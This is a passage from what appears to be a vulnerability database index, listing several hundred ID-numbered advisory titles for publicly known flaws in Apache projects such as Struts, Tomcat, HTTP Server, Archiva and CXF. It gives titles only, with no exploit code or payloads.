8419| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
8420| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
8421| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
8422| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
8423| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
8424| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
8425| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
8426| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8427| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
8428| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
8429| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
8430| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
8431| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8432| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
8433| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
8434| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
8435| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
8436| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
8437| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
8438| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
8439| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
8440| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
8441| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
8442| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
8443| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
8444| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
8445| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
8446| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
8447| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
8448| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
8449| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
8450| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
8451| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
8452| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
8453| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
8454| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
8455| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
8456| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
8457| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
8458| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
8459| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
8460| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
8461| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
8462| [94279] Apache Qpid CA Certificate Validation Bypass
8463| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
8464| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
8465| [94042] Apache Axis JAX-WS Java Unspecified Exposure
8466| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
8467| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
8468| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
8469| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
8470| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
8471| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
8472| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
8473| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
8474| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
8475| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
8476| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
8477| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
8478| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
8479| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
8480| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
8481| [93541] Apache Solr json.wrf Callback XSS
8482| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
8483| [93521] Apache jUDDI Security API Token Session Persistence Weakness
8484| [93520] Apache CloudStack Default SSL Key Weakness
8485| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
8486| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
8487| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
8488| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
8489| [93515] Apache HBase table.jsp name Parameter XSS
8490| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
8491| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
8492| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
8493| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
8494| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
8495| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
8496| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
8497| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
8498| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
8499| [93252] Apache Tomcat FORM Authenticator Session Fixation
8500| [93172] Apache Camel camel/endpoints/ Endpoint XSS
8501| [93171] Apache Sling HtmlResponse Error Message XSS
8502| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
8503| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
8504| [93168] Apache Click ErrorReport.java id Parameter XSS
8505| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
8506| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
8507| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
8508| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
8509| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
8510| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
8511| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
8512| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
8513| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
8514| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
8515| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
8516| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
8517| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
8518| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
8519| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
8520| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
8521| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
8522| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
8523| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
8524| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
8525| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
8526| [93144] Apache Solr Admin Command Execution CSRF
8527| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
8528| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
8529| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
8530| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
8531| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
8532| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
8533| [92748] Apache CloudStack VM Console Access Restriction Bypass
8534| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
8535| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
8536| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
8537| [92706] Apache ActiveMQ Debug Log Rendering XSS
8538| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
8539| [92270] Apache Tomcat Unspecified CSRF
8540| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
8541| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
8542| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
8543| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
8544| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
8545| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
8546| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
8547| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
8548| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
8549| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
8550| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
8551| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
8552| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
8553| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
8554| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
8555| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
8556| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
8557| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
8558| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
8559| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
8560| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
8561| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
8562| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
8563| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
8564| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
8565| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
8566| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
8567| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
8568| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
8569| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
8570| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
8571| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
8572| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
8573| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
8574| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
8575| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
8576| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
8577| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
8578| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
8579| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
8580| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
8581| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
8582| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
8583| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
8584| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
8585| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
8586| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
8587| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
8588| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
8589| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
8590| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
8591| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
8592| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
8593| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
8594| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
8595| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
8596| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
8597| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
8598| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
8599| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
8600| [86901] Apache Tomcat Error Message Path Disclosure
8601| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
8602| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
8603| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
8604| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
8605| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
8606| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
8607| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
8608| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
8609| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
8610| [85430] Apache mod_pagespeed Module Unspecified XSS
8611| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
8612| [85249] Apache Wicket Unspecified XSS
8613| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
8614| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
8615| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
8616| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
8617| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
8618| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
8619| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
8620| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
8621| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
8622| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
8623| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
8624| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
8625| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
8626| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
8627| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
8628| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
8629| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
8630| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
8631| [83339] Apache Roller Blogger Roll Unspecified XSS
8632| [83270] Apache Roller Unspecified Admin Action CSRF
8633| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
8634| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
8635| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
8636| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
8637| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
8638| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
8639| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
8640| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
8641| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
8642| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
8643| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
8644| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
8645| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
8646| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
8647| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
8648| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
8649| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
8650| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
8651| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
8652| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
8653| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
8654| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
8655| [80300] Apache Wicket wicket:pageMapName Parameter XSS
8656| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
8657| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
8658| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
8659| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
8660| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
8661| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
8662| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
8663| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
8664| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
8665| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
8666| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
8667| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
8668| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
8669| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
8670| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
8671| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
8672| [78331] Apache Tomcat Request Object Recycling Information Disclosure
8673| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
8674| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
8675| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
8676| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
8677| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
8678| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
8679| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
8680| [77593] Apache Struts Conversion Error OGNL Expression Injection
8681| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
8682| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
8683| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
8684| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
8685| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
8686| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
8687| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
8688| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
8689| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
8690| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
8691| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
8692| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
8693| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
8694| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
8695| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
8696| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
8697| [74725] Apache Wicket Multi Window Support Unspecified XSS
8698| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
8699| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
8700| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
8701| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
8702| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
8703| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
8704| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
8705| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
8706| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
8707| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
8708| [73644] Apache XML Security Signature Key Parsing Overflow DoS
8709| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
8710| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
8711| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
8712| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
8713| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
8714| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
8715| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
8716| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
8717| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
8718| [73154] Apache Archiva Multiple Unspecified CSRF
8719| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
8720| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
8721| [72238] Apache Struts Action / Method Names <
8722| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
8723| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
8724| [71557] Apache Tomcat HTML Manager Multiple XSS
8725| [71075] Apache Archiva User Management Page XSS
8726| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
8727| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
8728| [70924] Apache Continuum Multiple Admin Function CSRF
8729| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
8730| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
8731| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
8732| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
8733| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
8734| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
8735| [69520] Apache Archiva Administrator Credential Manipulation CSRF
8736| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
8737| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
8738| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
8739| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
8740| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
8741| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
8742| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
8743| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
8744| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
8745| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
8746| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
8747| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
8748| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
8749| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
8750| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
8751| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
8752| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
8753| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
8754| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
8755| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
8756| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
8757| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
8758| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
8759| [65054] Apache ActiveMQ Jetty Error Handler XSS
8760| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
8761| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
8762| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
8763| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
8764| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
8765| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
8766| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
